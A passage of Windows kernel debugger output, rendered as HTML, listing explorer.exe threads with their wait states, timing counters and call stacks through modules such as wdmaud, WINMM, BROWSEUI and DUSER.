Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dd4c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b286dd4c 014efd68 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b286dcec)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dd64 00000000 0x14efd68<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 823f5da8 Cid 0594.071c Teb: 7ffab000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 823c88f8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 828f06e8 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Context Switch Count 3 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> UserTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KernelTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Win32 Start Address wdmaud!MixerCallbackThread (0x72d230e8)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Stack Init b28d1000 Current b28d095c Base b28d1000 Limit b28ce000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Priority 15 BasePriority 15 PriorityDecrement 0 DecrementCount 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d0974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b28d0980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d09b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b28d0d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d0d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b28d0d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152fecc 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152fed0 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152ff6c 7c809c86 kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152ff88 72d2312a 
kernel32!WaitForMultipleObjects+0x18 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152ffb4 7c80b50b wdmaud!MixerCallbackThread+0x42 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 8245dda8 Cid 0594.0738 Teb: 7ffae000 Win32Thread: e1917078 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82904680 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 
12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Context Switch Count 895 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> UserTime 00:00:00.015<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KernelTime 00:00:01.062<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Win32 Start Address WINMM!mciwindow (0x76b44dd6)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Stack Init b2b81000 Current b2b80c20 Base b2b81000 Limit b2b7e000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Priority 12 BasePriority 10 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80c38 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; 
margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b80c44 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80c6c bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80d4c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b80d4c 0166ff98 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b2b80cec)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80d64 00000000 0x166ff98<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 823cc520 Cid 0594.074c Teb: 7ffaa000 Win32Thread: e2079418 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 827ec190 SynchronizationEvent<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 822d2810 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 14411 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:06.031<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:14.203<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2a70c80 Current b2a705dc Base b2a71000 Limit b2a6d000 <span style="color: #0000ff">Call</span> b2a70c80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a705f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a709c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a709c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a709e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afb48 7c90e9ab 
ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70c98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br 
/></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70cf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70d5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70d5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a70d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016aff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016affb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016affec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 
12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 824cbc28 Cid 0594.077c Teb: 7ffa9000 Win32Thread: e1c12008 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824967c8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82477238 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 
29 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.015<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address msvcrt!_endthreadex (0x77c3a341)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b262c000 Current b262b95c Base b262c000 Limit b2629000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 11 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262b974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b262b980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262b9b8 805b4d6a 
nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b262bd48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b262bd48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b262bd64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fdbc 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199fdc0 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fe5c 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199feb8 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199fed8 6c1e4ddc DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ff0c 6c1de394 DUSER!CoreSC::xwProcessNL+0xab (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199ff2c 6c1da6f1 DUSER!GetMessageExA+0x44 (FPO: 
[Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ff80 77c3a3b0 DUSER!ResourceManager::SharedThreadProc+0xb6 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0199ffb4 7c80b50b msvcrt!_endthreadex+0xa9 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0199ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 825c82d0 Cid 0594.0538 Teb: 7ffaf000 Win32Thread: e3306d28 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82515b00 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 
12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 1185 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.078<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.390<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address ntdll!RtlpWorkerThread (0x7c910760)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2a61000 Current b2a6095c Base b2a61000 Limit b2a5e000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 9 BasePriority 7 PriorityDecrement 0 DecrementCount 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a60974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a60980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a609b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a60d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a60d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a60d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0142fd60 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br 